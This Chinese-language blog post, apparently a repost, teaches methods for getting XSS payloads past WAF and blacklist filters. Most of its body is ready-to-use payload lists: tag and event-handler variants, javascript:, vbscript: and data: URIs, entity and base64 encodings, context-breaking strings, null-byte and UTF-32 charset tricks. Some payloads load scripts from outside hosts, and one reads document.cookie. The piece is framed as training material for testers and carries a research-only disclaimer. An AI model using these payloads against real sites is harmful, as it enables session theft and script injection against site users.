Bypass xss过滤的测试方法

admin 2019年5月11日00:00:23评论193 views字数 7364阅读24分32秒阅读模式
摘要

本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征确定是哪个WAF的测试方法给略过了,重点来看一下后面绕xss的一些基本的测试流程,虽说是绕WAF的,但这里还是根据WAF中的正则缺陷来绕过测试方法,并不是协议上问题,所以呢,基本可以通用于其他xss过滤的场景。方便新手们比较快速的了解到测试xss的一些基本的方法。

0x00 背景


本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征确定是哪个WAF的测试方法给略过了,重点来看一下后面绕xss的一些基本的测试流程,虽说是绕WAF的,但这里还是根据WAF中的正则缺陷来绕过测试方法,并不是协议上问题,所以呢,基本可以通用于其他xss过滤的场景。方便新手们比较快速的了解到测试xss的一些基本的方法。

0x01 Bypassing黑名单


大多数的场所是用的黑名单来做过滤器的,有三种方式绕过黑名单的测试:

1、暴力测试(输入大量的payload,看返回结果) 2、根据正则推算 3、利用浏览器bug 

初步测试

1)尝试插入比较正常的HTML标签,例如:<b>,<i>,<u>来看一下返回页面的情况是怎样的,是否被HTML编码了,或者标签被过滤了。

2)尝试插入不闭合的标签,例如:<b,<i,<u,<marquee然后看一下返回响应,是否对开放的标签也有过滤。

3)然后测试几个XSS的payload,基本所有的xss过滤器都会进行过滤的:

<script>alert(1);</script> <script>prompt(1);</script> <script>confirm(1);</script> <scriptsrc="http://rhainfosec.com/evil.js"> 

看返回响应,是过滤的全部,还是只过滤了部分,是否还留下了alert,prompt,confirm字符,再尝试大小写的组合:

<scRiPt>alert(1);</scrIPt> 

4)如果过滤器仅仅是把<script></script>标签过滤掉,那么可以用

<scr<script>ipt>alert(1)</scr<script>ipt> 

的方式来绕过,这样当<script>标签被过滤掉,剩下的组合起来刚好形成一个完整的payload。

5)用<a href标签来测试,看返回响应

<a href="http://www.google.com">Clickme</a> 

<a标签是否被过滤 href是否被过滤 href里的数据是否被过滤

如果没有数据被过滤,插入javascript协议看看:

<a href="javascript:alert(1)">Clickme</a> 

是否返回错误 javascript的整个协议内容是否都被过滤掉,还是只过滤了javascript字符 尝试下大小写转换

继续测试事件触发执行javascript:

<a href="rhainfosec.com" onmouseover=alert(1)>ClickHere</a> 

看onmouseover事件是否被过滤。测试一个无效的事件,看过滤规则:

<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a> 

是完整的返回了呢,还是跟onmouseover一样被干掉了。

如果是完整的返回的话呢,那么意味着,做了事件的黑名单,但是在HTML5中,有超过150种的方式来执行javascript代码的事件测试一个很少见的事件:

<body/onhashchange=alert(1)><a href=#>clickit 

测试其他标签

接下来测试其他的标签跟属性

<img src=x onerror=prompt(1);> <img/src=aaa.jpg onerror=prompt(1);>  <video src=x onerror=prompt(1);> <audio src=x onerror=prompt(1);> 
<iframe src="javascript:alert(2)"> <iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> 
<embed/src=//goo.gl/nlX0P> 

利用<form,<isindex等标签中的action属性执行javascript

<form action="Javascript:alert(1)"><input type=submit> <isindex action="javascript:alert(1)" type=image> <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> <isindex action=data:text/html, type=image> <formaction='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK 
<isindexformaction="javascript:alert(1)" type=image> <input type="image" formaction=JaVaScript:alert(0)> <form><button formaction=javascript&colon;alert(1)>CLICKME 
<table background=javascript:alert(1)></table> // 在Opera 10.5和IE6上有效 
<video poster=javascript:alert(1)//></video> // Opera 10.5以下有效 
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> <object/data=//goo.gl/nlX0P? 
<applet code="javascript:confirm(document.cookie);"> // Firefox有效 <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> 
<svg/onload=prompt(1);> <marquee/onstart=confirm(2)>/ <body onload=prompt(1);> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="javascript:alert(1)"> 
<q/oncut=open()> <q/oncut=alert(1)>//在限制长度的地方很有效 
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)> <bodylanguage=vbsonload=alert-1//IE8有效 <command onmouseover ="/x6A/x61/x76/x61/x53/x43/x52/x49/x50/x54/x26/x63/x6F/x6C/x6F/x6E/x3B/x63/x6F/x6E/x6 6/x69/x72/x6D/x26/x6C/x70/x61/x72/x3B/x31/x26/x72/x70/x61/x72/x3B">Save</command> //IE8有效 

当括号被过滤的时候可以使用throw来绕过

<a onmouseover="javascript:window.onerror=alert;throw 1> <img src=x onerror="javascript:window.onerror=alert;throw 1"> 

以上两个测试向量在Chrome跟IE在上面会出现一个“uncaught”的错误,可以用以下的向量:

<body/onload=javascript:window.onerror=eval;throw'=alert/x281/x29';> 
<img style="xss:expression(alert(0))"> // IE7以下 <div style="color:rgb(''&#0;x:expression(alert(1))"></div> // IE7以下 <style>#test{x:expression(alert(/XSS/))}</style> // IE7以下 
<a onmouseover=location='javascript:alert(1)'>click <body onfocus="loaction='javascript:alert(1)'">123 
<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:/u0061lert(1);"></g></svg> <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg> <meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <math><a xlink:href="//jsfiddle.net/t846h/">click 
<svg><script>alert&#40/1/&#41</script> // 通杀所有浏览器 

opera中可以不闭合

<svg><script>alert&#40 1&#41 // Opera可查 

实体编码

很多情况下WAF会实体编码用户的输入数据,

javascript是一个很灵活的语言,可以使用很多编码,比如十六进制,Unicode和HTML。但是也对这些编码可以用在哪个位置有规定:

属性:

href= action= formaction= location= on*= name= background= poster= src= code= 

支持的编码方式:HTML,八进制,十进制,十六进制和Unicode

属性:

data= 

支持的编码:base64

基于上下文的过滤

WAF最大的问题,在于不知道输出的位置的上下文,导致根据具体环境可以绕过。

<input value="XSStest" type=text> 

可控位置为XSStest,可以使用

"><img src=x onerror=prompt(0);> 

如果< >被过滤的话可以换成

" autofocus onfocus=alert(1)// 

同样还有很多其他的payload:

"onmouseover=" prompt(0)x=" "onfocusin=alert(1) autofocusx=" " onfocusout=alert(1) autofocus x=" "onblur=alert(1) autofocusa=" 

例如:

<script> Var x="Input"; </script> 

可控位置在Input,可以闭合script标签插入代码,但是同样我们仅仅闭合双引号就可以执行js代码了

";alert(1)// 

最终结果就是

<script> Var x="";alert(1)// </script> 

例如:

";document.body.addEventListener("DOMActivate",alert(1))// ";document.body.addEventListener("DOMActivate",prompt(1))// ";document.body.addEventListener("DOMActivate",confirm(1))// 

下面是一些相同的类:

DOMAttrModified DOMCharacterDataModified DOMFocusIn DOMFocusOut DOMMouseScroll DOMNodeInserted DOMNodeInsertedIntoDocument DOMNodeRemoved DOMNodeRemovedFromDocument DOMSubtreeModified 

例如:

<a href="Userinput">Click</a> 

可控的是Userinput那里我们需要做的只是把javascript代码输入就好了:

javascript:alert(1)// 

最后组合为:

<a href="javascript:alert(1)//">Click</a> 

使用HTML实体URL编码绕过黑名单,href里会自动实体解码,如果都失败了,可以尝试使用vbscript在IE10以下都有效,或者使用data协议。

使用javascript协议时可使用的例子:

javascript&#00058;alert(1) javaSCRIPT&colon;alert(1) JaVaScRipT:alert(1) javas&Tab;cript:/u0061lert(1); javascript:/u0061lert&#x28;1&#x29 javascript&#x3A;alert&lpar;document&period;cookie&rpar; 
vbscript:alert(1); vbscript&#00058;alert(1); vbscr&Tab;ipt:alert(1)" Data URl data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== 

当你的输入会在encodeURIComponent当中显示出来的时候,很容易插入xss代码了

encodeURIComponent('userinput') 

userinput处可控,测试代码:

-alert(1)- -prompt(1)- -confirm(1)- 

最终结果:

encodeURIComponent("-alert(1)-") encodeURIComponent("-prompt(1)-") 

当返回结果在svg标签中的时候,会有一个特性

<svg><script>varmyvar="YourInput";</script></svg> 

YourInput可控,输入

www.site.com/test.php?var=text";alert(1)// 

如果把"编码一些他仍然能够执行:

<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg> 

浏览器bug

字符集的bug在IE中出现过很多次,第一个就是UTF-7,但是这个只在之前的版本中可用,现在讨论一个在现在的浏览器当中可以执行的javascript。

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS 

这个页面当中我们可控当前页面的字符集,当我们常规的测试时:

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v="><img src=x onerror=prompt(0);> 

返回结果可以看到双引号被编码了:

<html> <meta charset="utf-8"></meta> <body> <input type="text" value="&quot;&gt;&lt;img src=x onerror=prompt(0);&gt;"></input> </body> </html>  

设置字符集为UTF-32:

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80 

上面这个在IE9及以下版本可以执行成功。

利用0字节绕过:

<scri%00pt>alert(1);</scri%00pt> <scri/x00pt>alert(1);</scri%00pt> <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t> 

在IE9及以下版本有效。

其他等等一系列浏览器特性的XSS可以参考以下文章:

http://drops.wooyun.org/tips/147

0x02 总结


本文主要是一个测试XSS的思路流程,并没有把所有的payload写全,其实也没有人能够写全,只是列了一个大体的框架,大家实际在寻找的过程中可以不断慢慢的根据这种思路补充自己的payload,想必呢,一定会有很大的进步的!~

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2019年5月11日00:00:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Bypass xss过滤的测试方法https://cn-sec.com/archives/66573.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息